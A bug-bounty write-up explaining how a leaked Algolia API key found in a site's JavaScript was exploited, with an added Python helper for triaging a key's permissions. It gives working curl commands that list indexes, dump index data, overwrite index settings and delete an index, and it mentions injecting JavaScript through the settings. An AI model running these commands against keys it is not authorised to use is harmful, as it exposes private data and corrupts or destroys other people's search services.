Algolia API Key Exploitation leads to $1000 Bounty (P2) on Private program
Hi everyone, this is Suryesh, a bug hunter from India. In this write-up I’ll explain how you can exploit an Algolia API key and earn $$$$.
Summary:
Algolia is a search API that powers the search function of over 50,000 sites. The Algolia API lets you set custom search suggestions using a company-defined index filled with searchable content. If the API is misconfigured and has the ‘listIndexes’ permission, it allows you to view all available indexes, sometimes including sensitive internal company documents. There are other permissions that can also be damaging. For instance, the ‘editSettings’ permission allows you to define JavaScript that runs when the search is used. As you can imagine, this can be quite dangerous for a large site with a lot of traffic.
I found the API key in the main.js file.
To exploit this vulnerability we will use the curl command. Now follow the steps below:
Step 1:
First of all, check the acl (permissions) granted to this API key. To check the acl, use this curl command:
curl "https://{appID}-dsn.algolia.net/1/keys/{apiKey}?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}" | jq
If the acl contains write permissions such as addObject, deleteObject, deleteIndex or editSettings, you are good to go. If the acl only contains search, listIndexes and settings, the finding is Informative, because you can’t perform any update action.
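As an added defender-side example (not part of the original write-up), this Python helper applies the same triage rule to the JSON returned by the key-info request above: write-capable acl values make the key dangerous, read-only ones make the finding Informative, and a key with no index, referer or expiry restriction is flagged as well. The field names (acl, indexes, referers, validity) follow Algolia's key-info response; both sample responses are constructed.

```python
import json

# ACLs that let the key holder modify or destroy data (the "good to go" case in the write-up).
WRITE_ACLS = {"addObject", "deleteObject", "deleteIndex", "editSettings"}
# ACLs that only read data; a key limited to these is Informative per the write-up.
READ_ACLS = {"search", "browse", "listIndexes", "settings"}

# Constructed sample responses in the shape of GET /1/keys/{apiKey} (no real keys or app IDs).
SAMPLE_WRITE_KEY = json.dumps({
    "value": "EXAMPLE_WRITE_KEY", "createdAt": 1700000000, "validity": 0,
    "acl": ["search", "listIndexes", "addObject", "editSettings", "deleteIndex"],
    "indexes": [], "referers": []})
SAMPLE_SEARCH_KEY = json.dumps({
    "value": "EXAMPLE_SEARCH_KEY", "createdAt": 1700000000, "validity": 0,
    "acl": ["search"], "indexes": ["prod_products"],
    "referers": ["https://shop.example.com/*"]})

def classify_algolia_key(key_json: str) -> dict:
    """Triage an exposed Algolia key from its key-info JSON the way the write-up does."""
    info = json.loads(key_json)
    acl = set(info.get("acl", []))
    write = sorted(acl & WRITE_ACLS)
    read = sorted(acl & READ_ACLS)
    findings = []
    if write:
        severity = "high"  # write-capable: index data or settings can be changed
        findings.append("write acl present: " + ", ".join(write))
        if "editSettings" in acl:
            findings.append("editSettings: index settings (e.g. highlightPreTag) can be rewritten")
        if acl & {"deleteIndex", "deleteObject"}:
            findings.append("delete acl present: destructive operations possible")
    elif read:
        severity = "informative"  # read-only, as the write-up rates it
        findings.append("read-only acl: " + ", ".join(read))
    else:
        severity = "none"
    # Scope checks: an unrestricted key applies to every index and every origin.
    if not info.get("indexes"):
        findings.append("no index restriction: key works on every index")
    if not info.get("referers"):
        findings.append("no referer restriction")
    if info.get("validity", 0) == 0:
        findings.append("no expiry (validity 0)")
    return {"severity": severity, "write_acl": write, "read_acl": read, "findings": findings}

if __name__ == "__main__":
    for sample in (SAMPLE_WRITE_KEY, SAMPLE_SEARCH_KEY):
        print(json.dumps(classify_algolia_key(sample), indent=2))
```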
Step 2:
Now list the indexes accessible with the API key:
curl -X GET -H "X-Algolia-API-Key: {apiKey}" -H "X-Algolia-Application-Id: {appID}" "https://{appID}-dsn.algolia.net/1/indexes/" | jq
The indexes will look like this:
Step 3:
Now check the data of an index by using this curl command:
curl -X GET -H "X-Algolia-API-Key: {apiKey}" -H "X-Algolia-Application-Id: {appID}" "https://{appID}-dsn.algolia.net/1/indexes/{Index_Name}" | jq
It will look like this:
Step 4:
Now check the settings configuration of an index from the list; to do so, use this curl command:
curl -X GET -H "X-Algolia-API-Key: {apiKey}" -H "X-Algolia-Application-Id: {appID}" "https://{appID}-dsn.algolia.net/1/indexes/{Index_Name}/settings" | jq
It will look like this:
Step 6:
Update a setting (here the highlightPreTag) using this curl command:
curl --request PUT --url "https://{appID}-1.algolianet.com/1/indexes/{Index_Name}/settings" --header 'content-type: application/json' --header 'x-algolia-api-key: {apiKey}' --header 'x-algolia-application-id: {appID}' --data '{"highlightPreTag": "hacked"}'
It will look like this:
Step 7:
Deleting an index. This action is prohibited by every program: you may retrieve and update data, but never delete it, so always avoid deleting any kind of data.
To delete data, the curl command would be:
curl -X DELETE "https://{appID}-dsn.algolia.net/1/indexes/{Index_Name}?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}"
Impact:
- An attacker could access internal documents, potentially leaking confidential business information, customer data, or other sensitive materials.
- By modifying the index settings, an attacker could inject malicious JavaScript. This could lead to widespread exploitation, such as stealing user credentials, payment information, and other personal data from users interacting with the search functionality on the affected site.
- An attacker could alter or corrupt indexes, causing significant disruption to the site’s search functionality. This could degrade user experience, lead to loss of business, and damage the company’s reputation.
- With the ability to modify settings, an attacker could potentially escalate their access, gaining further control over the system and causing even more damage.
- Exposure of sensitive data and potential theft of personal information could result in significant financial loss and legal liabilities, including fines and lawsuits for failing to protect user data.
Report Sent on: June 14, 2024
Rewarded on: June 30, 2024
Triaged on: July 03, 2024
If you learned something and want to donate, please donate here.